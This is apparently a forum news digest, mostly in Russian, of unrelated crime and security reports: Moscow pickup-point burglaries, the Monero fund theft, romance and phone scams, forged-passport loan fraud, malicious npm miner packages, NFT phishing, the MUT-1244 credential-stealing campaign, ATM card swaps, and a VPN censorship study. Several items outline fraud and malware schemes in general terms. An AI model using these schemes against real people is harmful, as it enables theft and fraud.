За последнее время в разных районах Москвы обокрали несколько ПВЗ. Схема каждый раз выглядела одинаково. Сперва воры искали сообщников в телеграм- каналах — человеку предлагали 100 тысяч рублей, чтобы он устроился в пункт выдачи заказов, немного поработал, узнал, где находятся камеры видеонаблюдения и как можно отключить сигнализацию. Самым важным был ключ — сообщник должен был сделать дубликат и передать преступникам.
В ночь кражи в пункт заказывали дорогие товары — например, несколько айфонов — а затем отменяли покупку. В результате деньги за заказ возвращались, а товары лежали в ПВЗ, готовые к выдаче краже. Полиция смогла задержать одну группу преступников с поличным, когда те ночью пробрались в ПВЗ, однако, по данным источников, это не единственные воры, которые работают по такой схеме.
Злоумышленник атаковал краудфандинговый кошелек сообщества Monero, выведя весь баланс в размере 2675,73 XMR (~$452 200 на момент написания).
Инцидент произошел 1 сентября, но разработчик под псевдонимом luigi1111 рассказал о нем только 2 ноября в ветке на GitHub. По его словам, причина эксплойта пока не установлена.
Он уточнил, что горячий кошелек проекта, на котором находится около 244 XMR, остается в безопасности.
«Эта атака является бессовестной, поскольку они захватили средства, на которые люди могли рассчитывать, чтобы оплатить аренду или купить еду», — отметил другой разработчик Рикардо Спаньи под ником Fluffypony.
Система краудфандинга сообщества Monero финансирует предложения участников сообщества по развитию экосистемы. Адрес фонда был настроен в системе Ubuntu в 2020 году вместе с узлом блокчейна.
Согласно сообщению, доступ к нему имели только luigi1111 и Fluffypony. Для осуществления платежей команда использовала десктопный горячий кошелек.
«Вполне возможно, что это связано с продолжающимися атаками, которые мы наблюдаем с апреля, поскольку они включают в себя множество скомпрометированных ключей (в том числе Bitcoin wallet.dat, сид-фразы, сгенерированные с помощью всевозможного аппаратного и программного обеспечения, предпродажные кошельки Ethereum и т. д.)», — предположил Спаньи.
По мнению других разработчиков, взлом мог произойти из-за того, что ключи кошелька были доступны онлайн на сервере Ubuntu.
Команда Monero призвала «Основной фонд» покрыть все издержки от инцидента.
38-летняя учительница из Шанхая влюбилась в мошенника и проспонсировала ему покупку первой криптовалюты на 4 млн юаней ($546 000).
Злоумышленник познакомился с женщиной через интернет в 2022 году, представился успешным предпринимателем и убедил ее в своих романтических чувствах. Спустя некоторое время он предложил вложиться в некий «прибыльный биткоин-проект».
В течение четырех месяцев учительница неоднократно переводила средства аферисту, для чего даже взяла кредит под залог своего дома.
На подозрительную активность на счетах пострадавшей обратила внимание полиция. Они проводили встречи с ней 12 раз, отговаривая от необдуманных вложений. Однако женщина отрицала, что ее «парень» может быть мошенником, поскольку он обещал жениться на ней.
Только после того, как другая жертва того же афериста поделилась историей в сети, учительница обратилась за помощью к правоохранителям.
source: scmp.com/news/people-culture/trending-china/article/3237375/he-will- marry-me-besotted-china-teacher-swindled-out-us555000-despite-12-police- warnings-insists
Основатель Pebble Эрик Мигиковски показал свой «маленький побочный проект» — карманный компьютер Beepberry. Устройство создано для использования с универсальным мессенджером Beeper, объединившем в себе 15 приложений от Twitter до WhatsApp, и ориентировано на людей, которые хотят оставаться на связи, но не хотят пользоваться обычным смартфоном.
Beepberry построен на базе Raspberry Pi Zero W, оснащен QWERTY-клавиатурой BlackBerry Classic с подсветкой, мини-тачпадом и 2,7-дюймовым ЖК-дисплеем Sharp Memoy 400x240. Таким образом, система построена на чипе Broadcom BCM2835 (1ГГц ARM11 core) и обладает 512 МБ оперативной памяти, а в качестве ОС используется Raspberry Pi OS Lite.
[](https://xakep.ru/wp- content/uploads/2023/05/424582/beepberry2-1280x579-1.jpeg)
Предполагается, что этот девайс нужно использовать с универсальным мессенджером Beeper, в создании которого Мигиковски так же принимал участие. Этот мессенджер объединяет в себе 15 других приложений, включая Twitter, Facebook*, WhatsApp, iMessage, Signal, Telegram, Discord, Slack и так далее, а также может работать с SMS.
Мигиковски рассказал в Twitter, что Beepberry появился на свет из-за того, что ему нужно было «устройство выходного дня», которое позволяло бы оставаться на связи с семьей и друзьями, но не отвлекало бы так, как обычный смартфон.
«Я представил себе крошечный e-paper экран, который можно хакнуть, с физической клавиатурой, работающий на Raspberry Pi, полезный для общения… и практически ни для чего больше», — пишет Мигиковски.
Click to expand...
В своем блоге Мигиковски тщательно подчеркивает, что Beepberry — не розничный продукт и даже не проект раннего доступа в стиле Kickstarter. Beepberry — это девайс для хакеров. Это просто клавиатура, Pi Zero W, экран и батарея, которая, в одном из демонстрационных видео вообще прикреплена к корпусу резинкой.
«Вы должны быть знакомы с Linux, чтобы добиться хоть чего-то от этого устройства! Корпуса нет (хотя его можно распечатать на 3D-принтере), аккумулятор висит сзади, и вам придется настроить/установить софт. Не ждите [от Beepberry] чего-то идеального», — пишет автор.
Click to expand...
Тем не менее, девайс уже доступен для предварительного заказа за 99 долларов за версию с Raspberry Pi Zero W. Если же сам одноплатник у покупателя уже есть, можно заплатить 79 долларов за все остальное (также понадобится докупить SD-карту).
Предварительные заказы обещают отгрузить через два-три месяца, но уже сейчас 50 хакерам-разработчиками могут предоставить доступ к готовым устройствам.
Прибыль злоумышленника составила почти 1,4 млн. рублей и один офис банка.
Утром 7 февраля мошенник, представившись «сотрудником службы безопасности банка», убедил 48-летнего жителя деревни Поречье (Московская область) Алексея в том, что накопления мужчины необходимо защитить от возможной кражи, оформив кредит в отделении банка.
В результате Алексей оформил кредит на 1 миллион 357 тысяч рублей, после чего отправил сумму мошеннику. После этого «сотрудник службы безопасности» убедил Алексея, что для выявления мошенников нужно поджечь офис Сбера, и прислал ему инструкцию по изготовлению «коктейля Молотова».
Удостоверившись, что в отделении нет людей, Алексей открыл дверь и закинул бутылку в угол. В результате инцидента пожар потушили сотрудники банка, а Алексея увезла полиция.
Отделение Сбера после пожара.
Ранее Ольга Тисен, начальник юридического управления Росфинмониторинга рассказала, что мошенники от имени Росфинмониторинга рассылают сообщения о мнимом взыскании денежных средств в связи с подозрительной активностью. Кроме того, в некоторых случаях в этих сообщениях используется имитация символики и печатей Росфинмониторинга.
Представители платформы пообещали компенсировать все убытки пользователей, как только получится восстановить работу сайта.
На днях был взломан один из крупнейших обменников CS.MONEY, специализирующийся на купле-продажи скинов для Counter Strike.
Как заявил представитель CS.MONEY, в общей сложности злоумышленникам удалось провести около тысячи сделок с использованием 100 учетных записей. Это стало возможным после получения доступа к файлам мобильных аутентификаторов, которые используются для авторизации в Steam. С их помощью неизвестные завладели аккаунтами ботов со скинами сервиса.
По оценкам компании, в результате взлома киберперступники похитили предметов на $6 млн, причем 2 из них принадлежали не сайту, а обычным пользователям. Представители платформы назвали взлом самым масштабным за всю историю сервиса и пообещали компенсировать все убытки игроков, как только работа сайта будет восстановлена.
Напомним, что в июне 2022 года хакеры украли у чешского киберспортсмена скины из CS:GO на сумму более миллиона рублей. Взлом произошел непосредственно во время турнира Tipsport Cup Bratislava 2022. Матч с участием команды Sampi, за которую выступал пострадавший, был остановлен.
source: escorenews.com/ru/csgo/news/37206-hakery-vzlomavshie-cs-money-ukrali- skiny-na-6-millionov-dollarov
Бывший рабочий строительной специальности, после развода с женой переехал в г. Днепр, где попытался устроить новую жизнь. Где-то на этом пути, ему повстречались «добрые люди», которые подсказали способ непыльного заработка, который заключался в обмане банков и финансовых организаций.
Следуя указаниям, мужчина нашел на сайте OLX объявление о продаже «официальных документов» и всего за 500 гривен, в тот же день получил на руки новый паспорт с собственной фотографией и вымышленным именем, который был передан ему методом «закладки» в условленном месте.
Вооружившись поддельным документом, мужчина зашел в отделение одной известной микрокредитной организации, где сообщил, что желает получить деньги. Заявку можно было бы подать и онлайн, но в таком случае документы проверялись бы по официальным базам, да и привязанной к фальшивому паспорту карты у строителя не было.
А вот при очной встрече, качество исполнения пластиковой ID-карты «на глаз» не вызвало подозрений у клерков, а «рабочий номер», который указал заемщик, произвел впечатление трудоустроенного и благонадежного клиента. В результате, мошеннику выдали быстрый кредит наличными на сумму 1,5 тысячи гривен.
Убедившись в том, что схема рабочая, мошенник снова вложил 500 гривен в новый поддельный ID-паспорт и спустя неделю опять явился в то же самое отделение кредитной организации. Заняв очередь к другому менеджеру, мужчина снова добился того, что ему одобрили кредит наличными, на этот раз – на 4 тысячи гривен.
Лишь спустя некоторое время, однако одна из сотрудниц, обрабатывавшая анкеты, обратила внимание, что два разных кредитных договора были оформлены на одного и того же человека, с разными именами.
По данному факту правоохранители возбудили уголовное дело о мошенничестве. Детальная экспертиза показала, что документы являются хотя и качественной, но все же подделкой, элементы защиты которой не отвечают установленным образцам.
Обвиненный сразу по двум статьям Уголовного Кодекса – за подделку документов (ст.358 ) и мошенничество, совершенное повторно (ч. 1,2 ст. 190), мошенник получил приговор, предусматривающий тюремное заключение, сроком 4 года. Однако, ввиду отсутствия прежних судимостей и чистосердечного признания вины, суд счел возможным назначить подсудимому испытательный срок, в течение 2 лет.
За минувший год американская корпорация предотвратила мошеннические операции на общую сумму в $1,5 млрд.
Американской кoрпорации Apple удалось пресечь потенциально мошеннические транзакции в своем магазине приложений App Store на общую сумму в размере более $1,5 млрд в 2020 году. Такие данные приводятся во вторник на официальном сайте компании.
"Только в 2020 году с помощью сочетания передовых технологий и экспертной аналитики удалось предотвратить использование более 3 млн украденных карт для покупки украденных товаров и услуг, а также заблокировать возможность повторного проведения транзакций почти 1 млн аккаунтов. В общей сложности Apple защитила пользователей от потенциально мошеннических транзакций на сумму более $1,5 млрд в 2020 году", говорится в официальном заявлении Apple.
Компания в прошлом году также зaблoкировала 470 тыс. учетных записей разработчиков приложений и отклонила еще 205 тыс. заявок на регистрацию с их стороны из-за опасений, связанных с возможным мошенничеством. "К сожалению, иногда учетные записи разработчиков создаются исключительно в мошеннических целях. Если нарушение со стороны разработчика является вопиющим или повторяется, нарушитель исключается из "Программы для разработчиков App Store", a действие его учетной записи приостанавливается", - отмечает Apple.
Помимо проверки в App Store, за последние 12 месяцев Apple oбнаружила и зaблокировала около 110 тыс. незаконных приложений с различными зловредами в пиратских магазинах приложений. Также Apple заблокировала более 3,2 млн экземпляров приложений, незаконно распространяемых среди пользователей в рамках прогрaммы Apple Developer Enterprise Program. Прoграмма предназначена для того, чтобы позволить компаниям и другим крупным организациям разрабатывать и частным образом распространять среди своих сотрудников приложения для внутреннего использования.
Несколько стран, множество квартир и десятки обманутых немцев – все это результат масштабной аферы злоумышленника.
6 октября Европол на острове Тенерифе арестовал гражданина Хорватии, подозреваемого в использовании поддельного веб-сайта для выдачи себя за швейцарскую инвестиционную компанию и мошенничестве на сумму 5 млн. евро.
50-летний подозреваемый, имя которого не разглашается, обвиняется в «управлении крупномасштабной многоуровневой схемой мошенничества с инвестициями», которая включала в себя поддельный веб-сайт для кражи денежных средств 70-ти граждан Германии.
Преступник выдавал себя за сотрудника настоящей инвестиционной компании из Женевы и убеждал жертв инвестировать в активы. Мошенник создал фальшивый сайт, который выглядел почти идентично сайту реальной компании.
Инвестиционные документы, которые имитировали документы банков и страховых компаний, также были предоставлены потенциальным жертвам, чтобы создать впечатление легитимности. В результате инвесторы отправляли средства банковским переводом на счета злоумышленника.
После получения денег мошенник исчезал, переводя украденные средства через другие страны для их отмывания. Полиция Германии начала расследование в 2019 году при поддержке отдела финансовых преступлений Европола, в конечном итоге правоохранители отследили украденные деньги до Турции и задержали преступника. В ходе расследования полиция обыскала объекты недвижимости злоумышленника в Германии, Нидерландах, Испании и Венгрии.
Европол заявил, что международное сотрудничество полиции сыграло ключевую роль в привлечении преступника к ответственности, поскольку преступник создал сложную инфраструктуру, разбросанную по нескольким странам, чтобы помешать правоохранительным органам выследить его.
В репозитории NPM [выявлены](https://blog.sonatype.com/newly-found-npm- malware-mines-cryptocurrency-on-windows-linux-macos-devices) три вредоносных пакета klow, klown и okhsa, которые прикрываясь функциональностью для разбора заголовка User-Agent (использовалась копия библиотеки UA-Parser-js) содержали вредоносные изменения, применяемые для организации майнинга криптовалют на системе пользователя. Пакеты были размещены одним пользователем 15 октября, но сразу выявлены сторонними исследователями, которые сообщили о проблеме администрации NPM. В итоге пакеты были удалены в течение дня после публикации, но успели набрать около 150 загрузок.
Напрямую вредоносный код содержался только в пакетах "klow" и "klown", которые использовались в пакете okhsa в качестве зависимостей. В пакете "okhsa" также имелась заглушка для запуска калькулятора в Windows. В зависимости от текущей платформы на систему пользователя с внешнего хоста загружался и запускался исполняемый файл для майнинга. Сборки майнера были подготовлены в Linux, macOS и Windows. При запуске передавался номер пула для совместного майнинга, номер криптокошелька и число ядер CPU для выполнения вычислений.
Аналитик Messari Чейз Девенс стал одной из жертв фишинговой атаки на выпуск токенов NFT-проекта Aurory Project на блокчейне Solana. Злоумышленник вывел из кошельков жертв криптовалюты и NFT более чем на $1 млн.
Предположительно, он клонировал сайт Aurory Project (app.aurory.io), на котором 31 августа в 18:00 (МСК) должен был стартовать выпуск, и разместил его на домене aurory.app.
Затем хакер начал продвигать фейковую ссылку в Discord-чате Aurory. При переходе по ней кошельки жертв полностью опустошались.
Одним из тех, кто попался на уловку злоумышленников, оказался Девенс.
«Друг скопировал сообщение из Discord в наш Slack-канал. Я подумал, что он проверил ссылку и был первым в группе, кто кликнул по ней. Все 15 000 SOL и NFT оказались украдены», — пояснил он.
Sad day.
Participated in the @AuroryProject drop and wasn't able to mint any NFTs. A friend copy pasted a message from the Discord into our slack channel, thought he had DD'd it. I was the first one in the group to click it and had $15k SOL and all my NFTs wiped
1/
— ͏c͏h͏a͏s͏e ͏d͏e͏v͏e͏n͏s (@chasedevens) August 31, 2021__https://twitter.com/x/status/1432742408991690753
Click to expand...
«Aurory Project только что опустошили мой кошелек через скам. Моя жизнь разрушена. Но, сам виноват, набрал app.aurory, думая, что это ваше приложение», — написал один из пользователей.
AuroryProject just got my wallet drained from a scam … https://t.co/bVT7p4LsTM … my life is in shambles … it's my own fault … i typed in https://t.co/bVT7p4LsTM thinking that was your app …. i am so sorry
— King Maven (@KingMaven_) August 31, 2021__https://twitter.com/x/status/1432711052509200385
Click to expand...
В какой-то момент адрес злоумышленника содержал более 10 600 SOL стоимостью свыше $1,1 млн. Он также заполучил несколько сотен NFT, включая токены серий Bold Badgers, Aurorians, SolRock, SolBears и Degenerate Apes.
«Прошлым вечером я провернул сделку с Degenerate Ape Academy с прибылью в 70 SOL и чувствовал себя на вершине мира, зная, что у меня в кармане все еще есть NFT-обезьяна Michael Jordan. Она ушла навсегда», — добавил Девенс.
На момент написания в аккаунте хакера оставалось 184 токена. Он продал значительную часть активов через NFT- платформу Solanart.
Команда Aurory Project признала проблемы с началом чеканки токенов, якобы из- за перегрузки сервера не все пользователи смогли узнать о старте. По их словам, все NFT были распроданы за 3 секунды.
Они также сообщили, что допустили ошибку в смарт-контракте, и пользователи выпускали токены за 1 SOL, а не за 5 SOL, как предполагалось.
So first of all, sorry for the people who encountered an issue during the sale..
The issues we encountered :
— Dedicated RPC server (312 cores) got slammed and people didn't saw when the mint started
— Error was present for the mint price in the smart contract, 1 instead of 5
— Aurory (@AuroryProject) August 31, 2021__https://twitter.com/x/status/1432735137628839936
Click to expand...
A threat actor tracked as MUT-1244 has stolen over 390,000 WordPress credentials in a large-scale, year-long campaign targeting other threat actors using a trojanized WordPress credentials checker.
Researchers at Datadog Security Labs, who spotted the attacks, say that SSH private keys and AWS access keys were also stolen from the compromised systems of hundreds of other victims, believed to include red teamers, penetration testers, security researchers, as well as malicious actors .
The victims were infected using the same second-stage payload pushed via
dozens of trojanized GitHub repositories delivering malicious proof-of-concept
(PoC) exploits that targeted known security flaws, along with a phishing
campaign prompting targets to install a fake kernel upgrade camouflaged as a
CPU microcode update.
While the phishing emails tricked victims into executing commands that
installed the malware, the fake repositories duped security professionals and
threat actors seeking exploit code for specific vulnerabilities.
Threat actors have used fake proof-of-concept exploits in the past to target researchers, hoping to steal valuable research or gain access to the networks of cybersecurity firms.
"Due to their naming, several of these repositories are automatically included in legitimate sources, such as Feedly Threat Intelligence or Vulnmon, as proof-of-concept repositories for these vulnerabilities," the researchers said." This increases their look of credibility and the likelihood that someone will run them."
The payloads were dropped via GitHub repos using multiple methods, including backdoored configure compilation files, malicious PDF files, Python droppers, and malicious npm packages included in the projects' dependencies.
As Datadog Security Labs found, this campaign overlaps with one highlighted in a November Checkmarkx report about a year-long supply-chain attack in which the "hpc20235/yawp" GitHub project was trojanized using malicious code in the "0xengine/xmlrpc" npm package to steal data and mine Monero cryptocurrency.
Malware deployed in these attacks includes a cryptocurrency miner and a backdoor that helped MUT-1244 collect and exfiltrate private SSH keys, AWS credentials, environment variables, and key directory contents such as "~/.aws."
The second-stage payload, hosted on a separate platform, allowed the attackers to exfiltrate data to file-sharing services like Dropbox and file.io, with the investigators finding hardcoded credentials for these platforms within the payload, giving the attackers easy access to the stolen info.
"MUT-1244 was able to gain access to over 390,000 credentials, believed to be Wordpress ones. We assess with high confidence that before these credentials were exfiltrated to Dropbox, they were in the hands of offensive actors, who likely acquired them through illicit means "Datadog Security Labs researchers said.
"These actors were then compromised through the yawpp tool they used to check the validity of these credentials. Since MUT-1244 advertised yawpp as a "credentials checker" for WordPress, it's no surprise that an attacker with a set of stolen credentials (which are often purchased from underground markets as a way to speed up threat actor operations) would use yawpp to validate them."
The attackers successfully exploited trust within the cybersecurity community to compromise dozens of machines belonging to both white hat and black hat hackers after the targets unknowingly executed the threat actor's malware, leading to data theft that included SSH keys, AWS access tokens, and command histories.
Datadog Security Labs estimates that hundreds of systems remain compromised, and others are still getting infected as part of this ongoing campaign.
Source: https://www.bleepingcomputer[.]com/...s-stolen-from-hackers-in-supply- chain-attack/
Злоумышленники имели базу данных фермерских хозяйств всех областей Украины, которые хотели продать зерно, купить горюче-смазочные материалы или приобрести минеральные удобрения. Аферисты выдавали себя за клиентов, но оплату или отправку товара, которая предусматривалась договорами, не осуществляли.
Чтобы придать своим действиям правдивый вид, мошенники приобрели несколько субъектов хозяйствования с необходимыми видами деятельности, заключили договор с оператором SIP-телефонии и арендовали специальное офисное помещение. Оттуда звонили потенциальным жертвам и рассылали SMS-сообщения с предложением продать им необходимые для сбора урожая товары или наоборот приобрести у них зерновые, с последующей отсрочкой оплаты.
Получив согласие на покупку зерна или продажу необходимых для сбора урожая товаров, мошенники заключали с потерпевшими соответствующие сделки и получали от них товар или средства, но свои обязательства не выполняли: удобрения и горюче-смазочные материалы не отгружались, а деньги за полученное зерно не перечислялись.
Чтобы отсрочить обращение обманутых лиц в правоохранительные органы, преступники длительное время обещали им выполнить свои обязательства по сделке и уговаривали потерпевших подождать. После этого мошенники вообще переставали отвечать на звонки. Взамен злоумышленники продавали зерно другим предпринимателям, которые не знали, что покупают краденое, а также обналичивали полученные мошенническим путем средства.
Оперативники Департамента уголовного розыска Нацполиции установили пятерых участников организованной преступной группы. По местам их проживания и работы полицейские провели 17 санкционированных обысков на территории, в частности г. Киева, Киевской и Винницкой областей. Правоохранители изъяли мобильные телефоны, компьютерную технику, черновые записи и другие вещественные доказательства преступной деятельности.
Следователи Нацполиции объявили о подозрении за мошенничество, совершенное организованной группой в крупных размерах, путем незаконных операций с использованием электронно-вычислительной техники (ч. 5 ст. 190 Уголовного Кодекса Украины) всем пятерым участникам преступной группы, в том числе организатору. За содеянное им грозит до двенадцати лет лишения свободы. Процессуальное руководство в производстве осуществляет Офис Генерального прокурора.
В Новосибирске и Новосибирской области сотрудники полиции выявили несколько ферм для майнинга, которые были незаконно подключены к высоковольтным линиям электропередач. При обысках с этих ферм были изъяты примерно 5 тыс. устройств. Нанесенный ущерб оценивается в 190 млн руб.
Сотрудники управления экономической безопасности и противодействия коррупции регионального управления МВД установили и задержали владельца этих майнинговых комплексов. Его имя в пресс-релизе не раскрывается , называется только его возраст — 35 лет.
По данным полиции, мужчина, чтобы не платить за электричество, потребляемое фермами, обратился к 39-летнему знакомому, которой работал в одном «из профильных учреждений». Тот за денежное вознаграждение организовал подключение ферм к высоковольтным линиям электропередачи, говорится в пресс-релизе МВД.
Уголовное дело возбуждено по трем статьям: причинение имущественного ущерба (ст. 165 УК), получение и дача взятки (ст. 290 и ст. 291 УК РФ). В рамках расследования одного из фигурантов дела арестовали, второму избрали подписку о невыезде. Расследование началось после обработки информации об аномальной нагрузке на электросети.
sc: mvdmedia.ru/news/ofitsialnyy-predstavitel/irina-volk-v-novosibirskoy- oblasti-politseyskimi-zaderzhany-podozrevaemye-v-nezakonnom-potreblenii-e
Двое мужчин были арестованы за обман клиентов банков в банках AlM путем замены их дебетовых карт на карты с истекшим сроком действия, а затем снятия денег с их банковских счетов.
Дуэт Прадьюм Ядав и Вивек Пандей ранее имели 16 дел о мошенничестве. Полиция изъяла у них 117 карточек банкоматов. Они преследовали пожилых людей и подростков, заменяя их дебетовые карты на просроченные или украденные и наблюдая, как они вводят свой PIN-код. После того как потерпевшие вышли из банкомата, обвиняемые использовали свои карты для снятия средств. Обвиняемые были пойманы после изучения записей камер видеонаблюдения и участвуют как минимум в 35-40 подобных случаях.
Полиция Курара арестовала двоих мужчин за обман клиентов банка в банкоматах путем замены их дебетовых карт на карты с истекшим сроком действия, а затем снятия денег со своего банка.
Прадьюм Ядав, 24 года, и Вивек Панди, 23 года, ранее уже совершили против них
16 правонарушений — все случаи мошенничества. Полиция изъяла у них 117
карточек банкоматов. Дуэт работает как поденная зарплата
чернорабочие. Два последних случая были зарегистрированы в поясе Малад-
Горегаон 3 декабря.
В первом случае 40-летняя женщина и ее сын-подросток посетили банкомат недалеко от Гокулдхама.
Подросток пытался снять 30 000 рупий на оплату школьного обучения. Один из обвиняемых предложил ему помощь и нажал несколько клавиш в машине. Подросток не смог получить деньги, но обвиняемому удалось присвоить сумму.
Во втором случае 27-летний мужчина пытался снять деньги в банкомате в селе Курар на домашние расходы, когда обвиняемый предложил помощь. Они обманным путем вывели 22 500 рупий и положил его в карман.
Значит попали в местную мусоровку зять, пенсионер и 21-летний х#й с горы. Их спрашивают: «Как здесь оказались?», а они: «Да вот, мошенника удерживали».
А на самом видео он раскаивается, заикается, и чуть ли не хнычет, что, мол, не знал вообще, что за работа такая.
По итогу +2 статьи и нахуй поехал. Зря раскаялся в содеянном.
А если бы дед зятю не позвонил тогда тогда бы ещё один заказ отвёз и так же ушел за ворота.
sourcec: t.me/mediamvd/25669
Исследование о том, как россияне пользуются инструментами обхода блокировок и как реагируют на блокировки этих сервисов.
Выводы:
как минимум 6 из 15 исследуемых VPN-сервисов испытывали проблемы с доступом в Сеть при блокировке протоколов OpenVPN и Wireguard;
пользовательская стратегия перебора VPN-сервисов в поисках рабочего — большая уязвимость при блокировке популярных протоколов;
существует мало исследований работы ТСПУ;
законодательная база для блокировки VPN-сервисов становится всё шире.
Интернет-цензура в России активно развивается с каждым годом. В индексе свободы интернета страна с 2011 года стабильно теряет позиции. Это обусловлено как регуляторными изменениями, создающими нормативную базу для усиления цензуры, так и ростом числа и разнообразия блокируемых ресурсов.
Сервисы обхода блокировок подвергаются активной цензуре в России с 2017 года, когда заработал запрет VPN-сервисам предоставлять доступ к заблокированным сайтам. В 2023 году государство пошло дальше и позволило Роскомнадзору блокировать саму информацию об обходе блокировок. Наконец, совсем недавно Совет Федерации попросил Роскомнадзор проверить и заблокировать более 50 VPN- сервисов, предоставляющих доступ к запрещённым в России соцсетям.
Вместе с тем востребованность VPN-сервисов и других инструментов по обходу блокировок резко выросла с началом «специальной военной операции», достигнув пиковых значений к середине марта 2022 года. По данным Atlas VPN, количество скачиваний различных VPN-сервисов увеличилось примерно в три раза по сравнению с 2021 годом, с 12 585 576 скачиваний в 2021-ом до 33 540 600 скачиваний в 2022-ом.
В 2023 году спрос резко упал, и за первую половину 2023 года российские пользователи скачали VPN только 3 366 919 раза. В дальнейшем всплески скачиваний совпадали по времени с сообщениями о блокировках популярных VPN- сервисов.
Представляем исследование о том, как россияне пользуются инструментами обхода блокировок, какие сервисы наиболее популярны и как пользователи реагируют на их блокировки сервисов.
VPN-сервисы и VPN-протоколы: около половины исследуемых блокируется
На основе наиболее популярных сервисов по количеству поисковых запросов и по
результатам нашего опроса среди пользователей, мы составили следующий список
из 15 популярных сервисов:
AdGuard VPN
Express VPN
Proton VPN
Turbo VPN
VPN Planet
VPN Proxy Master
Amnezia VPN
Lantern VPN
Psiphon VPN
Outline VPN
Secure VPN
Nord VPN
RedShield
Hola VPN
AntiZapret
По данным OONI, домены 8 из 15 самых популярных сервисов уже блокируются на
территории РФ.
Основные протоколы, используемые этим 15 сервисами:
OpenVPN,
Wireguard,
Shadowsocks,
IKEv2,
V2Ray.
Из 15 сервисов 4 используют только протокол OpenVPN либо собственный протокол, созданный на основе OpenVPN, ещё 2 сервиса используют Wireguard в дополнение к OpenVPN.
OpenVPN считается одним из самых уязвимых для блокировки протоколов. В
исследовании 2022 года CensoredPlanet в рамках эксперимента смогли
идентифицировать 85 % трафика, идущего через OpenVPN.
При этом данному протоколу отдают предпочтение российские банки и коммерческие
компании, использующие VPN.
Только 2 сервиса из 15 используют протокол Shadowsocks, это Amnezia VPN и Outline VPN.
Shadowsocks — единственный крупный протокол, который пока что не подвергся
массовым блокировкам. Его сложнее определить.
Хотя нельзя гарантировать, что сервисы, использующие Shadowsocks не
подвергнутся блокировкам со следующей волной. Также пока не блокируются
сервисы обфускации (маскировки соединения), однако, к сожалению, немногие
пользователи в России ими пользуются. Нельзя исключать и возможность
блокировки обфусцированного трафика: исследования показывают, что соединение с
помощью протокола OpenVPN можно достаточно легко обнаружить даже при
использовании разных механизмов обфускации.
6 из 15 сервисов имеют встроенную возможность использовать обфускаторы. Только 5 сервисов предлагают встроенные инструменты обеспечения анонимности.
Таким образом, когда в августе 2023 года начали блокировать протоколы OpenVPN
и Wireguard, как минимум 6 из 15 сервисов начали испытывать проблемы с
доступом в сеть.
В зависимости от эффективности обфускации остальных сервисов и осведомлённости
пользователей о существовании подобной настройки, ещё как минимум три сервиса
(Express VPN, Nord VPN, Proton VPN) могли оказаться заблокированы.
Так как блокировки с помощью ТСПУ (технические средства противодействия угрозам) не всегда осуществляются по решению суда или включению ресурса в реестр Роскомнадзора, некоторые сервисы смогли подать иск к Роскомнадзору с требованием отменить блокировку. Пока неизвестно, чем закончится этот процесс, но этот иск может стать хорошим прецедентом в юридической практике.
От запрещённой информации до запрета информации о VPN
VPN-сервисы в России блокировались в разном масштабе начиная с 2017 года,
когда вступил в силу закон о запрете использования VPN-сервисов и
анонимайзеров для доступа к запрещённой информации.
В 2019 году Роскомнадзор начал требовать от VPN-сервисов, действующих на территории РФ подключения к Федеральной государственной информационной системе (ФГИС).
В 2021 году появлялись первые сообщения о протокольных блокировках.
О проблемах в работе сервисов сообщали и продолжают сообщать в 2022 году и в 2023 году. Также в 2023 году государство позволило Роскомнадзору блокировать саму информацию об обходе блокировок.
С марта 2024 года маркетплейсы должны будут удалять приложения VPN-сервисов по требованию Роскомнадзора. В следующем году он может начать блокировать все VPN-сервисы, которые предоставляют доступ к заблокированным в России сайтам. В первую очередь блокировка коснётся сервисов в магазинах приложений.
Интернет-цензура в целом приняла всеобъемлющие масштабы в 2023 году. Так, в середине 2023 года Роскомнадзор отчитался об увеличении числа блокировок на 85 % по сравнению с 2022 годом. При этом ещё в 2022 году уже было заблокировано большинство сайтов независимых медиа, активно блокировались зеркала независимых ресурсов, сайты правозащитных проектов и политических организаций. По данным OONI, цензура в России затронула практически все типы контента — от коммерческих бизнесов до экологических и просветительских проектов.
Выводы: мало данных о ТСПУ, мало навыков у пользователей
В рамках этого исследования мы обнаружили несколько лакун, на которые нам бы
хотелось обратить внимание правозащитного, технологического и
исследовательского сообщества в России.
Исследование работы ТСПУ. На данный момент опубликовано всего несколько академических исследований о том, сколько российских ТСПУ установлено на данный момент и как они фильтруют трафик российских пользователей. Так как ТСПУ являются ключевым элементом российской цензуры, который позволяет усилить ее за счёт централизации, мы считаем, что технологическому и исследовательскому сообществу нужно больше взаимодействовать для изучения этой темы.
Осведомление пользователей о механзмах работы VPN-сервисов и обфускации. Текущая пользовательская стратегия перебора VPN-сервисов в поисках рабочего приложения может стать большой уязвимостью при блокировке основных популярных протоколов.
Цензура в России усиливается с каждым годом. Увеличивается как число, так и разнообразие блокируемых сервисов. Если раньше блокировки часто были непоследовательными и одни и те же ресурсы могли блокироваться разными способами и в разной степени у разных провайдеров на различных сетях, то в 2021 году в России для блокировки впервые были применены ТСПУ.
В октябре 2023 Amnezia VPN анонсировала свой протокол AmneziaWG,
предназначенный для стран со строгой цензурой.
В 2022 году исследователи показали, что с помощью DPI устройств можно
сравнительно легко обнаруживать соединения, осуществляемые с помощью одного из
самых распространенных протоколов OpenVPN даже при использовании обфускации.
В 2023 году мы видим, как ТСПУ применяется в России для блокировки отдельных VPN-протоколов и как эти блокировки могут происходить скоординировано в одно и то же время у разных провайдерах в разных регионах.
Несмотря на то, что большинство российских пользователей пользуются VPN- сервисами и знают о существовании интернет-цензуры и блокировок, многие из них недостаточно осведомлены о том, как именно работают инструменты обхода блокировок.
Такая неосведомленность, с одной стороны, приводит к тому, что люди выбирают
неблагонадёжные сервисы, предпочитая более дешёвые или бесплатные приложения,
с другой стороны, в случае блокировки отдельных протоколов не имеют
достаточных знаний, чтобы настроить используемый сервис и обойти блокировку.
Цензура в России реализуется не только на уровне сети, но также и на уровне
отдельных сервисов, в том числе на уровне социальных сетей и поисковых
платформ. Такую цензуру намного сложнее отследить, во многом нам приходится
опираться на данные и заявления отдельных сервисов.
](https://roskomsvoboda.org/post/vpn-in-russia-2023/)
Исследование о том, как россияне пользуются инструментами обхода блокировок и как реагируют на блокировки этих сервисов.
roskomsvoboda.org
Сингапур продолжает переживать всплеск активности кейлоггеров, эксплуатируемых одной или несколькими киберпреступными группировками. Журналисты The Straits Times выяснили, что только за первое полугодие жертвами этого типа вредоносного ПО стали не менее 750 человек, у которых было украдено более 10 миллионов долларов.
